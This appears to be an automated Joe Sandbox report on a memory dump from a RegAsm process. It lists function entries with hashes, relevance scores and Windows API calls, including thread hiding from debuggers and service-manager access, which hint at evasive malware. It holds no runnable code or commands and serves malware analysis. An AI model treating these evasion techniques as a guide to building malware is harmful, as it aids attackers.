Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 68e7dcc3ce3d1113b6e969b583a2bec2118b05f2f1e7f93d0369e8117068a90e
Instruction ID: f711233bcf00b29f409e65473625ca8ffbd6b86ab0c97fad811d208b694dbe4d
Opcode Fuzzy Hash: 68e7dcc3ce3d1113b6e969b583a2bec2118b05f2f1e7f93d0369e8117068a90e
Instruction Fuzzy Hash: 9C21C26060920ECDFF369A28C46C7B87666AF6232DF591DDBC50A46CA1C37D84C4C752

Uniqueness

Uniqueness Score: -1.00%

Function 01374D8A, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 229db98142ada14c271b76e7c7bc722e62dcadae0dfc261dd67df5a5add57e18
Instruction ID: bd7b24ade9571d4d16583ec6dfaecb225310633bde78f7a1faf0f2eaf6ee8570
Opcode Fuzzy Hash: 229db98142ada14c271b76e7c7bc722e62dcadae0dfc261dd67df5a5add57e18
Instruction Fuzzy Hash: EB215CB070534A8BDB32EFAD84917CA3BE66F5A254F10841DDC0587612DB34E811CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01374EE0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fb006b379eea413755191105f8c783e059167a9423b42269475ed3aa38b426f
Instruction ID: a6026768a53bfe1a3b69eb1ce449680edc6378ca69b5e608c33d8dd6d484ea27
Opcode Fuzzy Hash: 3fb006b379eea413755191105f8c783e059167a9423b42269475ed3aa38b426f
Instruction Fuzzy Hash: 2B214B3100E3C69FDB37AB784851A957F95AF53168B0989CAC4818BC63C72C6906DB11

Uniqueness

Uniqueness Score: -1.00%

Function 01378BA6, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b1bcb37ad154e1506116d50eb232e3a39fee61fca8828056921dcadf6223ce87
Instruction ID: 04cfd1596c404e8001d498c08667b6ce316a78fccb68cafab09642fdf2f078e5
Opcode Fuzzy Hash: b1bcb37ad154e1506116d50eb232e3a39fee61fca8828056921dcadf6223ce87
Instruction Fuzzy Hash: 0721B42060820ADDFF369B28C51C7B9B666AF6132DF995DDBC40A46C62C33D84C4C752

Uniqueness

Uniqueness Score: -1.00%

Function 01374DEB, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8cca09deb79c8524b2d646d1f9f59e5dee096573dd21945b10cfaf71fabddaa
Instruction ID: 789cb01deef4d957179c09892cf68868bbab41ee5153f7062cd6fc1cc0597e17
Opcode Fuzzy Hash: c8cca09deb79c8524b2d646d1f9f59e5dee096573dd21945b10cfaf71fabddaa
Instruction Fuzzy Hash: 72212CB060934A8FDB22DFADC491BCA3FE2BF56294F208459DC418B616DB34E811DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01374D61, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65a2a5e15f126b06b00aab15f2e02a53e2f1cdb5cf851fed5d3345adab5466f4
Instruction ID: 2a23b09cde9784dab3385c1ae3df683fe753188084f796c4b493257badf84d00
Opcode Fuzzy Hash: 65a2a5e15f126b06b00aab15f2e02a53e2f1cdb5cf851fed5d3345adab5466f4
Instruction Fuzzy Hash: FC21DAB070534B8FDB71DF6984A27CA3BA6BFA92A4F208019CC4587715DB34D811CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01378E45, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 92885758edf3b654390d7317bd5a72e13392f346bba9182a9d7d6b4b56e31a14
Instruction ID: 627130d89ad6a03d7b20ff2dba8d2446c8e605a7eb16e6148946da8594c5611b
Opcode Fuzzy Hash: 92885758edf3b654390d7317bd5a72e13392f346bba9182a9d7d6b4b56e31a14
Instruction Fuzzy Hash: 7511E66160D3899EFB33EF7CC648AA97BD6DE07218F580CC8D48697927C369A444C302

Uniqueness

Uniqueness Score: -1.00%

Function 01378D3A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: ec671602b39a7b8c28fcd63917d706ea8bc06ae1ad4576ad2925c37364070776
Instruction ID: 036d180da10bbeca6672b14c9e09b746ee2b1505279627ba3644fc484540e2cf
Opcode Fuzzy Hash: ec671602b39a7b8c28fcd63917d706ea8bc06ae1ad4576ad2925c37364070776
Instruction Fuzzy Hash: E3019E2070924AEEFB7AFA7C805CAB83B97DD6325C7991CC5C59787D26C32A6485C302

Uniqueness

Uniqueness Score: -1.00%

Function 01374E8C, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ddbb2cd563ba9ae367152b33122e57fc7e39a07bc1b5663514ae52148c761f7
Instruction ID: 0e9b4291b120c242c0e2282dd259688d174d8a1d2429195cdc3361f4b1c34d84
Opcode Fuzzy Hash: 4ddbb2cd563ba9ae367152b33122e57fc7e39a07bc1b5663514ae52148c761f7
Instruction Fuzzy Hash: 25116F7020E38ADFDB23EFB884529C73FA16F13264F154888D8414B913DB38AC22DB95

Uniqueness

Uniqueness Score: -1.00%

Function 01376286, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8469a3ea64247e50e550eae2007dd2ee54b9b90b188bc38eb89caba0d007aef
Instruction ID: c7ce2e57c4c0e69c02f9ce1c875a2111590d1be27f150a4e32e00c9b75e5e2df
Opcode Fuzzy Hash: b8469a3ea64247e50e550eae2007dd2ee54b9b90b188bc38eb89caba0d007aef
Instruction Fuzzy Hash: 3C01FED0008D6DD5FE3236AC86737FD222F9B122ACF544429FD5762805875D84408553

Uniqueness

Uniqueness Score: -1.00%

Function 013763AE, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 34f9e0c7cf3eee6ab5ab3691b8a93e2d829c4beab2271bd3c02375da53eedcaa
Instruction ID: 34818490152e8851b9cdac41d0c1dad9bc41655b9b152cfe982bbccbe357b820
Opcode Fuzzy Hash: 34f9e0c7cf3eee6ab5ab3691b8a93e2d829c4beab2271bd3c02375da53eedcaa
Instruction Fuzzy Hash: E60184A020DB85ABFF33FFAC8552DE537D69A47198B451C88E896E3517C729B404DB02

Uniqueness

Uniqueness Score: -1.00%

Function 01378D96, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 36e88aef834b8d78a1773baa3139f1a80abf46ff88c7feefa7dc97a1df3c982c
Instruction ID: 3f9fac303ea13ee5ee1a3159fe48b8061a6c79e779cde4b184f813c6bf279ba6
Opcode Fuzzy Hash: 36e88aef834b8d78a1773baa3139f1a80abf46ff88c7feefa7dc97a1df3c982c
Instruction Fuzzy Hash: 7BF0C22070924ADEFF36FE7CC458AF53BA69D1361C78D0CC4C44687D26C32A6481C302

Uniqueness

Uniqueness Score: -1.00%

Function 01370742, Relevance: 1.5, APIs: 1, Instructions: 38nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(01370837,?,00000000,0000510A,00000020,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 013707EB
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 77db77bb1c8192bffd1410eb684ff8039d49e04af468e6933b15429faca9aee2
Instruction ID: 3c3844892288ce748806b577eb11255541df0625e163ad8017d0bea909c60eae
Opcode Fuzzy Hash: 77db77bb1c8192bffd1410eb684ff8039d49e04af468e6933b15429faca9aee2
Instruction Fuzzy Hash: 6FF09E7410D289BEDAB9C62CCC90B7E77ED9BC7328F20842AF456D7582C42D4440CA71

Uniqueness

Uniqueness Score: -1.00%

Function 01378DF8, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 20b35d7f5bf7eb7da883a2af535258ec4c00fc97d969a2d8e538c812fa30b929
Instruction ID: 4d91e5bafedaffce1f8cbda70a33814cb506854e08db14a55bdb061df015533a
Opcode Fuzzy Hash: 20b35d7f5bf7eb7da883a2af535258ec4c00fc97d969a2d8e538c812fa30b929
Instruction Fuzzy Hash: CFF0B42020D285DFFF37FF6CC5489AA3BD69D0365CB880CC4D446A7D26C329A484C356

Uniqueness

Uniqueness Score: -1.00%

Function 0137637E, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7e8b7735a7ec05fee2f3569820638273edac6b034c1f5454a9e60a46a5e1b352
Instruction ID: dacf37fd02b8f6b485473edd587a0b658bdaec57e394850a98df65217b3cb3e2
Opcode Fuzzy Hash: 7e8b7735a7ec05fee2f3569820638273edac6b034c1f5454a9e60a46a5e1b352
Instruction Fuzzy Hash: 08F0BBA010DA99D7FF33BF6C85329F9379A590719CF880854EC5363812C76DD404C701

Uniqueness

Uniqueness Score: -1.00%

Function 0137079A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumWindows.USER32(01370837,?,00000000,0000510A,00000020,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 013707EB

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: c8fff4ec5a57611b01cc0f45674071b3e4338707782591ccb32214984ddbb9e4
Instruction ID: f5873e8b7b1f5e1d4bafbb1ac82dce351e41cc671bb2d6faf6f17ebf909f7f18
Opcode Fuzzy Hash: c8fff4ec5a57611b01cc0f45674071b3e4338707782591ccb32214984ddbb9e4
Instruction Fuzzy Hash: 2DF02774209189BEEA79DA28CDC0B3E77E99B8B728F308828F457E6581C53884418A20

Uniqueness

Uniqueness Score: -1.00%

Function 0137076E, Relevance: 1.5, APIs: 1, Instructions: 33nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(01370837,?,00000000,0000510A,00000020,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 013707EB
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 01bcbdb96aa450e7bab76fb76ca8601ddb7e64bbecd355102a7ede061f53cdd0
Instruction ID: 61872a8eebf9d2b3b4bef5c8668efebadc53064b6425dedd1d946f43e8a63f25
Opcode Fuzzy Hash: 01bcbdb96aa450e7bab76fb76ca8601ddb7e64bbecd355102a7ede061f53cdd0
Instruction Fuzzy Hash: 02F0A7742051897EDAB8DA28CD90B3D67E99BC7728F20C868F46AD6591C52884418B11

Uniqueness

Uniqueness Score: -1.00%

Function 013707B8, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(01370837,?,00000000,0000510A,00000020,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 013707EB
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 5cf12ade839df3952328cf2ed22f62b2630b66e5cf4be01bcc58fd9b3ff59083
Instruction ID: 72f79eab071dec7664a8ecd24b3f20be8c629c7bd24fc998381edf37875b05ec
Opcode Fuzzy Hash: 5cf12ade839df3952328cf2ed22f62b2630b66e5cf4be01bcc58fd9b3ff59083
Instruction Fuzzy Hash: 69E0D8792051497EDBB8DA28CD40B7E77F59FCA724F30892CF4AADA691C53484858B60

Uniqueness

Uniqueness Score: -1.00%

Function 0137468A, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d1ef4e65c5fc5e4fd8a80ee348bad9290a2e35c449826450974574cc72b4dbc
Instruction ID: 1958b5ec468877cd64b39d18af716a5b22e815ddcb640c1a445aa218fddb6fee
Opcode Fuzzy Hash: 5d1ef4e65c5fc5e4fd8a80ee348bad9290a2e35c449826450974574cc72b4dbc
Instruction Fuzzy Hash: 6CE02B3B04238F1ED5252E7802466C77F749F9226431EC0879140979764F187E17F3E5

Uniqueness

Uniqueness Score: -1.00%

Function 0137430A, Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,01374297,01374355,01370A22,00000000,00000000,00000000,?,00000000,00000000), ref: 013742FD

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b9283189814f6a031c1261a28c5dc8f104b8d3fcaa22487a9846dcb3aeed55da
Instruction ID: a826548e0134717732206023699425a54f578302c38cb695edd71cd9fd23b451
Opcode Fuzzy Hash: b9283189814f6a031c1261a28c5dc8f104b8d3fcaa22487a9846dcb3aeed55da
Instruction Fuzzy Hash: BBE0867111E2C5EBEB22FF7C9944E857B819707154F155C84E456D7503C365B421C715

Uniqueness

Uniqueness Score: -1.00%

Function 0137623C, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d20705a509bc88788a139ed4b6265eac5ab1b8dccc975818000088cdad72f077
Instruction ID: 2108c90af3bcdde410c35e5a34b54530e052ebaae63c3270d9aee61c900f138e
Opcode Fuzzy Hash: d20705a509bc88788a139ed4b6265eac5ab1b8dccc975818000088cdad72f077
Instruction Fuzzy Hash: 2BC012E4419E7FA8FB763A158A376BB143ECF405DEF444418FC43629006F2CC4008110

Uniqueness

Uniqueness Score: -1.00%

Function 013742E9, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,01374297,01374355,01370A22,00000000,00000000,00000000,?,00000000,00000000), ref: 013742FD

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C

Uniqueness

Uniqueness Score: -1.00%

Function 0137162D, Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 11d2c22560b4e0e64189e5a85e06d662b3a0d6bce01278f80a4f5b2060dfe284
Instruction ID: 156ae446dde44b9e168a6c2731873ef4d4a8716a71bf72558be3a599e3292d66
Opcode Fuzzy Hash: 11d2c22560b4e0e64189e5a85e06d662b3a0d6bce01278f80a4f5b2060dfe284
Instruction Fuzzy Hash: B611603120A389DFEF36AF799804FEA3BA69F43658F080848EC8597412D779D554EB12

Uniqueness

Uniqueness Score: -1.00%

Function 013715EE, Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9352d7e7c8a4fe8b36baf7ff838d1a53e0cc58ac2a278d7e0bc0f74f5856ae0d
Instruction ID: b18263688f18d329afd0045c7cef98d925b070a5ea73367588a4725a5d8b27ab
Opcode Fuzzy Hash: 9352d7e7c8a4fe8b36baf7ff838d1a53e0cc58ac2a278d7e0bc0f74f5856ae0d
Instruction Fuzzy Hash: 3D11A031349349EBEF366F288D44FEA3BA6AF46758F084404EC4696001D739DA549B12

Uniqueness

Uniqueness Score: -1.00%

Function 013716BF, Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ff3bbf9aab3365a966ce5b26833a7b5d83a9bea1d7ecd42c3b5a86178471a5e2
Instruction ID: b8ce8f3cc1471ff732d239c37af3050803c838c18bf0ee95696bd321a227642f
Opcode Fuzzy Hash: ff3bbf9aab3365a966ce5b26833a7b5d83a9bea1d7ecd42c3b5a86178471a5e2
Instruction Fuzzy Hash: 7611E63260A3C9AFDF32AF288C44EE93B565F03558F050845EC418B412D269C5659712

Uniqueness

Uniqueness Score: -1.00%

Function 01371560, Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0137468A: LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: c0f581927610b23d896641d3ab9c700f40462e0e70c7ae2456dce85e1744afec
Instruction ID: 905a4d26acdd7c2f53dcd619931b822a61b7a3085edc6745669c4a642ddb71b7
Opcode Fuzzy Hash: c0f581927610b23d896641d3ab9c700f40462e0e70c7ae2456dce85e1744afec
Instruction Fuzzy Hash: 5411C03234434DEFEF352F208E54FEE3B6BAF45758F084009ED0A59040D73986A4AA12

Uniqueness

Uniqueness Score: -1.00%

Function 0137158D, Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0137468A: LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: ba9461119e50546d6d99856ea3c5b824bda2fc96c338713eb3c5d1e96fc9b8bd
Instruction ID: 4627cda2a708808ac469e46465936e7c78856e4d48ecbea381b5ec7643973aca
Opcode Fuzzy Hash: ba9461119e50546d6d99856ea3c5b824bda2fc96c338713eb3c5d1e96fc9b8bd
Instruction Fuzzy Hash: FD11D63274530DDFEF355F219D55FEE376BAF81758F084009ED0A9A040D739C664AA12

Uniqueness

Uniqueness Score: -1.00%

Function 01371676, Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8e7cb2735ce6664672d2bc1b4babd8cbff5f2945d4a6063816f6f33612384a1b
Instruction ID: a70b6762d208444deee9ed8dcc39dbe76d573e77ddc5ab6666d14b79618c2ade
Opcode Fuzzy Hash: 8e7cb2735ce6664672d2bc1b4babd8cbff5f2945d4a6063816f6f33612384a1b
Instruction Fuzzy Hash: 4811C231209388AFDF32AF688C44FE93BA6AF43668F084488EC8597512D379D550A712

Uniqueness

Uniqueness Score: -1.00%

Function 013715C2, Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0137468A: LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

